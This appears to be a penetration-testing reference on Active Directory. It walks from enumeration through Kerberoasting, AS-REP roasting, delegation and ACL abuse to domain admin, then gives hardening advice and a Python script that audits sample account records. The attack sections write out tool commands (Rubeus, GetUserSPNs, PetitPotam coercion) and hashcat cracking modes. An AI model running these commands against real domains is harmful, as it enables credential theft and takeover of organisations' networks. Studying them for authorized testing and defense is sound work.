
Active Directory Pentest.

AD attack surface end-to-end: enumeration, Kerberos, ACL abuse, GPO weaponization, the Tier-0 chase — including the internal-engagement playbook from foothold to domain dominance.

Enumeration (any authenticated user)

  • BloodHound collection. SharpHound -c All,GPOLocalGroup from a domain-joined host; or bloodhound-python -c All -u user -p pass -d domain.local -ns DC_IP from Linux. Always run with --ldapfilter to scope collection in large environments.
  • User and computer enum. ldapsearch -x -h DC -b "dc=domain,dc=local" "(objectClass=user)". Look for description fields containing passwords — still the single most common AD finding.
  • SPN inventory. setspn -Q */* or GetUserSPNs.py. Service accounts here are kerberoast candidates.
  • GPO inspection. Get-GPO -All, walk \\domain\SYSVOL\domain\Policies\ for cpassword in Groups.xml (GPP creds, decryptable).

Kerberos abuse

  1. Kerberoasting. Rubeus.exe kerberoast /outfile:hashes.txt or GetUserSPNs.py -request. Crack hashcat mode 13100 with rockyou + best64.rule. Service accounts with passwords < 14 chars typically fall.
  2. ASREP-roasting. Rubeus.exe asreproast or GetNPUsers.py -no-pass -usersfile users.txt for accounts with DONT_REQUIRE_PREAUTH. Hashcat mode 18200.
  3. Unconstrained delegation abuse. Computer accounts with TRUSTED_FOR_DELEGATION → coerce DC auth via PetitPotam or printer bug → captured TGT.
  4. Constrained delegation (S4U2Self/Proxy). Computer/user with msDS-AllowedToDelegateTo → request TGS as any user to the configured SPN → Rubeus.exe s4u /user:WEB$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/dc01.
  5. Resource-based constrained delegation. Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer → add attacker-controlled machine account → impersonate any user to that target.

ACL abuse — dangerous rights

  • GenericAll on user. Reset password or set SPN → kerberoast.
  • WriteDACL on object. Grant self GenericAll → all of the above.
  • WriteOwner. Take ownership → WriteDACL → GenericAll.
  • ForceChangePassword on user. Set-DomainUserPassword (PowerView). Loud but fast.
  • AddMember on group. Especially Domain Admins, Enterprise Admins, Schema Admins, and any tier-0 group.
  • GenericWrite on computer. Set RBCD on target → impersonate any user via S4U.

Defenses

  • gMSAs for service accounts. 240-byte rotated passwords defeat kerberoasting categorically.
  • PRE_AUTH required on every account. Audit (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) regularly.
  • Tier-0 isolation. Domain Admins log in only from PAWs. No Tier-0 secret ever cached on a Tier-1 host.
  • LDAP signing + channel binding. Defeats relay attacks against DCs.
  • SMB signing required. Defeats NTLM relay across the file-server fleet.
  • Disable spooler service on every DC. Removes the printer-bug delegation primitive.

Rule of thumb. Path to DA is almost always shorter in BloodHound than you'd expect. Run it on day one of any internal engagement, before any other tooling. The graph tells you which 3–4 of the next 50 things to try.
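As an added example (not code from this page or any tool it names), a small offline check of the attributes the Defenses list says to audit: it builds the page's bitwise userAccountControl filter for any flag, and over constructed account records flags enabled accounts without pre-auth, non-DC accounts with unconstrained delegation, and SPN-bearing user accounts that are not gMSAs. The flag constants are the documented userAccountControl bits; the records are constructed, not a real export.

```python
# Added example, not code from the original page: an offline audit of the
# userAccountControl and servicePrincipalName attributes the Defenses section
# says to review. The account records below are constructed, not a real export.
UF_ACCOUNTDISABLE = 0x2
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000   # member computer (and gMSA) account
UF_SERVER_TRUST_ACCOUNT = 0x2000        # domain controller account
UF_TRUSTED_FOR_DELEGATION = 0x80000     # unconstrained delegation
UF_DONT_REQUIRE_PREAUTH = 0x400000      # 4194304, the bit in the page's filter

GMSA_CLASS = "msDS-GroupManagedServiceAccount"
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def ldap_bit_filter(bit: int) -> str:
    """Build the bitwise-AND LDAP filter for one userAccountControl flag."""
    return f"(&(objectClass=user)(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={bit}))"


def audit_accounts(accounts: list) -> dict:
    """Return the account names that trip each hardening check.

    Disabled accounts are skipped. DCs are excluded from the unconstrained
    delegation finding because SERVER_TRUST_ACCOUNT objects carry that bit by design.
    """
    findings = {"no_preauth": [], "unconstrained_delegation": [], "spn_without_gmsa": []}
    for acct in accounts:
        uac = acct["userAccountControl"]
        if uac & UF_ACCOUNTDISABLE:
            continue
        name = acct["sAMAccountName"]
        is_machine = bool(uac & (UF_WORKSTATION_TRUST_ACCOUNT | UF_SERVER_TRUST_ACCOUNT))
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings["no_preauth"].append(name)
        if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
            findings["unconstrained_delegation"].append(name)
        # Kerberoast exposure: SPNs on an account whose password is human-chosen,
        # i.e. neither a machine account nor a gMSA.
        if (acct.get("servicePrincipalName") and not is_machine
                and GMSA_CLASS not in acct.get("objectClass", [])):
            findings["spn_without_gmsa"].append(name)
    return {k: sorted(v) for k, v in findings.items()}


# Constructed sample records shaped like an LDAP export (0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.domain.local:1433"], "objectClass": ["user"]},
    {"sAMAccountName": "gmsa_web$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "servicePrincipalName": ["HTTP/web01.domain.local"], "objectClass": ["user", "computer", GMSA_CLASS]},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [], "objectClass": ["user"]},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x10202 | UF_DONT_REQUIRE_PREAUTH,  # disabled
     "servicePrincipalName": ["CIFS/old01.domain.local"], "objectClass": ["user"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/web01.domain.local"], "objectClass": ["computer"]},
    {"sAMAccountName": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/dc01.domain.local"], "objectClass": ["computer"]},
]

if __name__ == "__main__":
    for finding, names in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(f"{finding}: {', '.join(names) or '-'}")
```

Feed it the output of a real LDAP export of userAccountControl, servicePrincipalName and objectClass and the three lists become the remediation queue for the gMSA, pre-auth and delegation items above.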
